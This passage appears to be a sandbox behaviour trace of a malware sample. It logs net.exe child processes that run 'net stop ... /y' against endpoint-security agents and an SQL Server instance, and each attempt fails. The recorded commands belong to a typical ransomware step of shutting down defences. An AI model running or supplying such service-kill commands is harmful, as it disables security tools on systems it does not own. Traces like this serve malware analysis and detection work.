_String2="MBEndpointAgent") returned 6 [0210.710] _wcsicmp (_String1="time", _String2="MBEndpointAgent") returned 7 [0210.710] _wcsicmp (_String1="user", _String2="MBEndpointAgent") returned 8 [0210.710] _wcsicmp (_String1="users", _String2="MBEndpointAgent") returned 8 [0210.710] _wcsicmp (_String1="msg", _String2="MBEndpointAgent") returned 17 [0210.710] _wcsicmp (_String1="messenger", _String2="MBEndpointAgent") returned 3 [0210.710] _wcsicmp (_String1="receiver", _String2="MBEndpointAgent") returned 5 [0210.710] _wcsicmp (_String1="rcv", _String2="MBEndpointAgent") returned 5 [0210.710] _wcsicmp (_String1="netpopup", _String2="MBEndpointAgent") returned 1 [0210.710] _wcsicmp (_String1="redirector", _String2="MBEndpointAgent") returned 5 [0210.710] _wcsicmp (_String1="redir", _String2="MBEndpointAgent") returned 5 [0210.710] _wcsicmp (_String1="rdr", _String2="MBEndpointAgent") returned 5 [0210.710] _wcsicmp (_String1="workstation", _String2="MBEndpointAgent") returned 10 [0210.710] _wcsicmp (_String1="work", _String2="MBEndpointAgent") returned 10 [0210.710] _wcsicmp (_String1="wksta", _String2="MBEndpointAgent") returned 10 [0210.711] _wcsicmp (_String1="prdr", _String2="MBEndpointAgent") returned 3 [0210.711] _wcsicmp (_String1="devrdr", _String2="MBEndpointAgent") returned -9 [0210.711] _wcsicmp (_String1="lanmanworkstation", _String2="MBEndpointAgent") returned -1 [0210.711] _wcsicmp (_String1="server", _String2="MBEndpointAgent") returned 6 [0210.711] _wcsicmp (_String1="svr", _String2="MBEndpointAgent") returned 6 [0210.711] _wcsicmp (_String1="srv", _String2="MBEndpointAgent") returned 6 [0210.711] _wcsicmp (_String1="lanmanserver", _String2="MBEndpointAgent") returned -1 [0210.711] _wcsicmp (_String1="alerter", _String2="MBEndpointAgent") returned -12 [0210.711] _wcsicmp (_String1="netlogon", _String2="MBEndpointAgent") returned 1 [0210.711] _wcsupr (in: _String="MBEndpointAgent" | out: _String="MBENDPOINTAGENT") returned="MBENDPOINTAGENT" [0210.711] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x435460 [0210.714] GetServiceKeyNameW (in: hSCManager=0x435460, lpDisplayName="MBENDPOINTAGENT", lpServiceName=0x65aaf0, lpcchBuffer=0x1afcfc | out: lpServiceName="", lpcchBuffer=0x1afcfc) returned 0 [0210.714] _wcsicmp (_String1="msg", _String2="MBENDPOINTAGENT") returned 17 [0210.714] _wcsicmp (_String1="messenger", _String2="MBENDPOINTAGENT") returned 3 [0210.714] _wcsicmp (_String1="receiver", _String2="MBENDPOINTAGENT") returned 5 [0210.714] _wcsicmp (_String1="rcv", _String2="MBENDPOINTAGENT") returned 5 [0210.714] _wcsicmp (_String1="redirector", _String2="MBENDPOINTAGENT") returned 5 [0210.714] _wcsicmp (_String1="redir", _String2="MBENDPOINTAGENT") returned 5 [0210.714] _wcsicmp (_String1="rdr", _String2="MBENDPOINTAGENT") returned 5 [0210.714] _wcsicmp (_String1="workstation", _String2="MBENDPOINTAGENT") returned 10 [0210.714] _wcsicmp (_String1="work", _String2="MBENDPOINTAGENT") returned 10 [0210.714] _wcsicmp (_String1="wksta", _String2="MBENDPOINTAGENT") returned 10 [0210.714] _wcsicmp (_String1="prdr", _String2="MBENDPOINTAGENT") returned 3 [0210.714] _wcsicmp (_String1="devrdr", _String2="MBENDPOINTAGENT") returned -9 [0210.714] _wcsicmp (_String1="lanmanworkstation", _String2="MBENDPOINTAGENT") returned -1 [0210.714] _wcsicmp (_String1="server", _String2="MBENDPOINTAGENT") returned 6 [0210.715] _wcsicmp (_String1="svr", _String2="MBENDPOINTAGENT") returned 6 [0210.715] _wcsicmp (_String1="srv", _String2="MBENDPOINTAGENT") returned 6 [0210.715] _wcsicmp (_String1="lanmanserver", _String2="MBENDPOINTAGENT") returned -1 [0210.715] _wcsicmp (_String1="alerter", _String2="MBENDPOINTAGENT") returned -12 [0210.715] _wcsicmp (_String1="netlogon", _String2="MBENDPOINTAGENT") returned 1 [0210.715] NetServiceControl (in: servername=0x0, service="MBENDPOINTAGENT", opcode=0x0, arg=0x0, bufptr=0x1afcf8 | out: bufptr=0x1afcf8) returned 0x889 [0210.716] wcscpy_s (in: _Destination=0x65a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0210.716] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0210.719] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x65b338, nSize=0x800, Arguments=0x659dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0210.720] GetFileType (hFile=0x26c) returned 0x3 [0210.720] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x433f90 [0210.720] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x433f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0210.720] WriteFile (in: hFile=0x26c, lpBuffer=0x433f90, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1afc38, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1afc38, lpOverlapped=0x0) returned 0 [0210.720] LocalFree (hMem=0x433f90) returned 0x0 [0210.720] GetFileType (hFile=0x26c) returned 0x3 [0210.720] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x436238 [0210.720] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x436238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nC", lpUsedDefaultChar=0x0) returned 2 [0210.720] WriteFile (in: hFile=0x26c, lpBuffer=0x436238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1afc38, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1afc38, lpOverlapped=0x0) returned 0 [0210.720] LocalFree (hMem=0x436238) returned 0x0 [0210.721] _ultow (in: _Dest=0x889, _Radix=1768552 | out: _Dest=0x889) returned="2185" [0210.721] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x65b338, nSize=0x800, Arguments=0x659dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0210.721] GetFileType (hFile=0x26c) returned 0x3 [0210.721] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x436238 [0210.721] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x436238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0210.721] WriteFile (in: hFile=0x26c, lpBuffer=0x436238, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1afc44, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1afc44, lpOverlapped=0x0) returned 0 [0210.721] LocalFree (hMem=0x436238) returned 0x0 [0210.721] GetFileType (hFile=0x26c) returned 0x3 [0210.721] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x436238 [0210.721] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x436238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nC", lpUsedDefaultChar=0x0) returned 2 [0210.721] WriteFile (in: hFile=0x26c, lpBuffer=0x436238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1afc44, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1afc44, lpOverlapped=0x0) returned 0 [0210.721] LocalFree (hMem=0x436238) returned 0x0 [0210.722] NetApiBufferFree (Buffer=0x431c78) returned 0x0 [0210.722] NetApiBufferFree (Buffer=0x431c90) returned 0x0 [0210.722] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MBEndpointAgent /y" [0210.722] exit (_Code=2) Process: id = "288" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6bb94000" os_pid = "0xa7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop swi_service /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 461 os_tid = 0x790 Process: id = "289" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x20741000" os_pid = "0x390" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "288" os_parent_pid = "0xa7c" cmd_line = "C:\\Windows\\system32\\net1 stop swi_service /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 462 os_tid = 0x12c [0210.857] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x17fed8 | out: lpSystemTimeAsFileTime=0x17fed8*(dwLowDateTime=0x46df42a0, dwHighDateTime=0x1d57a87)) [0210.857] GetCurrentProcessId () returned 0x390 [0210.857] GetCurrentThreadId () returned 0x12c [0210.857] GetTickCount () returned 0x116e4c4 [0210.857] QueryPerformanceCounter (in: lpPerformanceCount=0x17fed0 | out: lpPerformanceCount=0x17fed0*=33114217899) returned 1 [0210.858] GetModuleHandleA (lpModuleName=0x0) returned 0xb00000 [0210.858] __set_app_type (_Type=0x1) [0210.858] __p__fmode () returned 0x74eb31f4 [0210.858] __p__commode () returned 0x74eb31fc [0210.858] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb0ffe6) returned 0x0 [0210.858] __getmainargs (in: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068, _DoWildCard=0, _StartInfo=0xb19024 | out: _Argc=0xb19064, _Argv=0xb1906c, _Env=0xb19068) returned 0 [0210.858] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0210.858] GetConsoleOutputCP () returned 0x1b5 [0210.858] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb19080 | out: lpCPInfo=0xb19080) returned 1 [0210.859] SetThreadUILanguage (LangId=0x0) returned 0x409 [0210.861] sprintf_s (in: _DstBuf=0x17fe90, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0210.862] setlocale (category=0, locale=".437") returned="English_United States.437" [0210.864] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0210.864] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0210.864] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_service /y" [0210.864] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x17fc5c, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0210.864] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6a) returned 0x513c10 [0210.864] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0210.864] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x17fe60 | out: Buffer=0x17fe60*=0x511c70) returned 0x0 [0210.864] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x17fe60 | out: Buffer=0x17fe60*=0x511c88) returned 0x0 [0210.864] _fileno (_File=0x74eb2900) returned -2 [0210.864] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0210.864] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0210.864] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0210.864] _wcsicmp (_String1="config", _String2="stop") returned -16 [0210.864] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0210.864] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0210.864] _wcsicmp (_String1="file", _String2="stop") returned -13 [0210.864] _wcsicmp (_String1="files", _String2="stop") returned -13 [0210.864] _wcsicmp (_String1="group", _String2="stop") returned -12 [0210.864] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0210.864] _wcsicmp (_String1="help", _String2="stop") returned -11 [0210.865] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0210.865] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0210.865] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0210.865] _wcsicmp (_String1="session", _String2="stop") returned -15 [0210.865] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0210.865] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0210.865] _wcsicmp (_String1="share", _String2="stop") returned -12 [0210.865] _wcsicmp (_String1="start", _String2="stop") returned -14 [0210.865] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0210.865] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0210.865] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0210.865] _wcsicmp (_String1="accounts", _String2="swi_service") returned -18 [0210.865] _wcsicmp (_String1="computer", _String2="swi_service") returned -16 [0210.865] _wcsicmp (_String1="config", _String2="swi_service") returned -16 [0210.865] _wcsicmp (_String1="continue", _String2="swi_service") returned -16 [0210.865] _wcsicmp (_String1="cont", _String2="swi_service") returned -16 [0210.865] _wcsicmp (_String1="file", _String2="swi_service") returned -13 [0210.865] _wcsicmp (_String1="files", _String2="swi_service") returned -13 [0210.865] _wcsicmp (_String1="group", _String2="swi_service") returned -12 [0210.865] _wcsicmp (_String1="groups", _String2="swi_service") returned -12 [0210.865] _wcsicmp (_String1="help", _String2="swi_service") returned -11 [0210.865] _wcsicmp (_String1="helpmsg", _String2="swi_service") returned -11 [0210.865] _wcsicmp (_String1="localgroup", _String2="swi_service") returned -7 [0210.865] _wcsicmp (_String1="pause", _String2="swi_service") returned -3 [0210.865] _wcsicmp (_String1="session", _String2="swi_service") returned -18 [0210.865] _wcsicmp (_String1="sessions", _String2="swi_service") returned -18 [0210.865] _wcsicmp (_String1="sess", _String2="swi_service") returned -18 [0210.865] _wcsicmp (_String1="share", _String2="swi_service") returned -15 [0210.865] _wcsicmp (_String1="start", _String2="swi_service") returned -3 [0210.865] _wcsicmp (_String1="stats", _String2="swi_service") returned -3 [0210.865] _wcsicmp (_String1="statistics", _String2="swi_service") returned -3 [0210.865] _wcsicmp (_String1="stop", _String2="swi_service") returned -3 [0210.865] _wcsicmp (_String1="time", _String2="swi_service") returned 1 [0210.865] _wcsicmp (_String1="user", _String2="swi_service") returned 2 [0210.865] _wcsicmp (_String1="users", _String2="swi_service") returned 2 [0210.865] _wcsicmp (_String1="msg", _String2="swi_service") returned -6 [0210.865] _wcsicmp (_String1="messenger", _String2="swi_service") returned -6 [0210.865] _wcsicmp (_String1="receiver", _String2="swi_service") returned -1 [0210.866] _wcsicmp (_String1="rcv", _String2="swi_service") returned -1 [0210.866] _wcsicmp (_String1="netpopup", _String2="swi_service") returned -5 [0210.866] _wcsicmp (_String1="redirector", _String2="swi_service") returned -1 [0210.866] _wcsicmp (_String1="redir", _String2="swi_service") returned -1 [0210.866] _wcsicmp (_String1="rdr", _String2="swi_service") returned -1 [0210.866] _wcsicmp (_String1="workstation", _String2="swi_service") returned 4 [0210.866] _wcsicmp (_String1="work", _String2="swi_service") returned 4 [0210.866] _wcsicmp (_String1="wksta", _String2="swi_service") returned 4 [0210.866] _wcsicmp (_String1="prdr", _String2="swi_service") returned -3 [0210.866] _wcsicmp (_String1="devrdr", _String2="swi_service") returned -15 [0210.866] _wcsicmp (_String1="lanmanworkstation", _String2="swi_service") returned -7 [0210.866] _wcsicmp (_String1="server", _String2="swi_service") returned -18 [0210.866] _wcsicmp (_String1="svr", _String2="swi_service") returned -1 [0210.866] _wcsicmp (_String1="srv", _String2="swi_service") returned -5 [0210.866] _wcsicmp (_String1="lanmanserver", _String2="swi_service") returned -7 [0210.866] _wcsicmp (_String1="alerter", _String2="swi_service") returned -18 [0210.866] _wcsicmp (_String1="netlogon", _String2="swi_service") returned -5 [0210.866] _wcsupr (in: _String="swi_service" | out: _String="SWI_SERVICE") returned="SWI_SERVICE" [0210.866] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5154d0 [0210.869] GetServiceKeyNameW (in: hSCManager=0x5154d0, lpDisplayName="SWI_SERVICE", lpServiceName=0xb1aaf0, lpcchBuffer=0x17fdfc | out: lpServiceName="", lpcchBuffer=0x17fdfc) returned 0 [0210.869] _wcsicmp (_String1="msg", _String2="SWI_SERVICE") returned -6 [0210.869] _wcsicmp (_String1="messenger", _String2="SWI_SERVICE") returned -6 [0210.869] _wcsicmp (_String1="receiver", _String2="SWI_SERVICE") returned -1 [0210.869] _wcsicmp (_String1="rcv", _String2="SWI_SERVICE") returned -1 [0210.870] _wcsicmp (_String1="redirector", _String2="SWI_SERVICE") returned -1 [0210.870] _wcsicmp (_String1="redir", _String2="SWI_SERVICE") returned -1 [0210.870] _wcsicmp (_String1="rdr", _String2="SWI_SERVICE") returned -1 [0210.870] _wcsicmp (_String1="workstation", _String2="SWI_SERVICE") returned 4 [0210.870] _wcsicmp (_String1="work", _String2="SWI_SERVICE") returned 4 [0210.870] _wcsicmp (_String1="wksta", _String2="SWI_SERVICE") returned 4 [0210.870] _wcsicmp (_String1="prdr", _String2="SWI_SERVICE") returned -3 [0210.870] _wcsicmp (_String1="devrdr", _String2="SWI_SERVICE") returned -15 [0210.870] _wcsicmp (_String1="lanmanworkstation", _String2="SWI_SERVICE") returned -7 [0210.870] _wcsicmp (_String1="server", _String2="SWI_SERVICE") returned -18 [0210.870] _wcsicmp (_String1="svr", _String2="SWI_SERVICE") returned -1 [0210.870] _wcsicmp (_String1="srv", _String2="SWI_SERVICE") returned -5 [0210.870] _wcsicmp (_String1="lanmanserver", _String2="SWI_SERVICE") returned -7 [0210.870] _wcsicmp (_String1="alerter", _String2="SWI_SERVICE") returned -18 [0210.870] _wcsicmp (_String1="netlogon", _String2="SWI_SERVICE") returned -5 [0210.870] NetServiceControl (in: servername=0x0, service="SWI_SERVICE", opcode=0x0, arg=0x0, bufptr=0x17fdf8 | out: bufptr=0x17fdf8) returned 0x889 [0210.871] wcscpy_s (in: _Destination=0xb1a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0210.871] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0210.871] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a80000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0210.873] GetFileType (hFile=0x26c) returned 0x3 [0210.873] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x514000 [0210.873] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x514000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0210.873] WriteFile (in: hFile=0x26c, lpBuffer=0x514000, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x17fd38, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fd38, lpOverlapped=0x0) returned 0 [0210.873] LocalFree (hMem=0x514000) returned 0x0 [0210.873] GetFileType (hFile=0x26c) returned 0x3 [0210.873] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5162a8 [0210.873] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5162a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nQ", lpUsedDefaultChar=0x0) returned 2 [0210.873] WriteFile (in: hFile=0x26c, lpBuffer=0x5162a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x17fd38, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fd38, lpOverlapped=0x0) returned 0 [0210.873] LocalFree (hMem=0x5162a8) returned 0x0 [0210.873] _ultow (in: _Dest=0x889, _Radix=1572200 | out: _Dest=0x889) returned="2185" [0210.873] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xb1b338, nSize=0x800, Arguments=0xb19dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0210.873] GetFileType (hFile=0x26c) returned 0x3 [0210.873] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x5162a8 [0210.873] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x5162a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0210.873] WriteFile (in: hFile=0x26c, lpBuffer=0x5162a8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x17fd44, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fd44, lpOverlapped=0x0) returned 0 [0210.873] LocalFree (hMem=0x5162a8) returned 0x0 [0210.873] GetFileType (hFile=0x26c) returned 0x3 [0210.873] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x5162a8 [0210.873] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x5162a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nQ", lpUsedDefaultChar=0x0) returned 2 [0210.873] WriteFile (in: hFile=0x26c, lpBuffer=0x5162a8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x17fd44, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fd44, lpOverlapped=0x0) returned 0 [0210.874] LocalFree (hMem=0x5162a8) returned 0x0 [0210.874] NetApiBufferFree (Buffer=0x511c70) returned 0x0 [0210.874] NetApiBufferFree (Buffer=0x511c88) returned 0x0 [0210.874] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop swi_service /y" [0210.874] exit (_Code=2) Process: id = "290" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x65999000" os_pid = "0x664" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop MSSQL$PRACTICEMGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 463 os_tid = 0xac8 Process: id = "291" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4dd6f000" os_pid = "0x6e8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "290" os_parent_pid = "0x664" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$PRACTICEMGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 464 os_tid = 0x764 [0211.066] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x35f9e0 | out: lpSystemTimeAsFileTime=0x35f9e0*(dwLowDateTime=0x46fe3480, dwHighDateTime=0x1d57a87)) [0211.066] GetCurrentProcessId () returned 0x6e8 [0211.066] GetCurrentThreadId () returned 0x764 [0211.066] GetTickCount () returned 0x116e58f [0211.066] QueryPerformanceCounter (in: lpPerformanceCount=0x35f9d8 | out: lpPerformanceCount=0x35f9d8*=33135031264) returned 1 [0211.066] GetModuleHandleA (lpModuleName=0x0) returned 0xab0000 [0211.066] __set_app_type (_Type=0x1) [0211.066] __p__fmode () returned 0x74eb31f4 [0211.066] __p__commode () returned 0x74eb31fc [0211.066] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xabffe6) returned 0x0 [0211.066] __getmainargs (in: _Argc=0xac9064, _Argv=0xac906c, _Env=0xac9068, _DoWildCard=0, _StartInfo=0xac9024 | out: _Argc=0xac9064, _Argv=0xac906c, _Env=0xac9068) returned 0 [0211.066] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0211.066] GetConsoleOutputCP () returned 0x1b5 [0211.067] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xac9080 | out: lpCPInfo=0xac9080) returned 1 [0211.067] SetThreadUILanguage (LangId=0x0) returned 0x409 [0211.070] sprintf_s (in: _DstBuf=0x35f998, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0211.070] setlocale (category=0, locale=".437") returned="English_United States.437" [0211.072] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0211.072] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0211.072] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PRACTICEMGT /y" [0211.072] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x35f764, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0211.072] RtlAllocateHeap (HeapHandle=0x7a0000, Flags=0x0, Size=0x76) returned 0x7af788 [0211.072] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0211.072] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35f968 | out: Buffer=0x35f968*=0x7b1c78) returned 0x0 [0211.072] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x35f968 | out: Buffer=0x35f968*=0x7b1c90) returned 0x0 [0211.072] _fileno (_File=0x74eb2900) returned -2 [0211.072] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0211.072] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0211.072] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0211.072] _wcsicmp (_String1="config", _String2="stop") returned -16 [0211.073] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0211.073] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0211.073] _wcsicmp (_String1="file", _String2="stop") returned -13 [0211.073] _wcsicmp (_String1="files", _String2="stop") returned -13 [0211.073] _wcsicmp (_String1="group", _String2="stop") returned -12 [0211.073] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0211.073] _wcsicmp (_String1="help", _String2="stop") returned -11 [0211.073] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0211.073] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0211.073] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0211.073] _wcsicmp (_String1="session", _String2="stop") returned -15 [0211.073] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0211.073] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0211.073] _wcsicmp (_String1="share", _String2="stop") returned -12 [0211.073] _wcsicmp 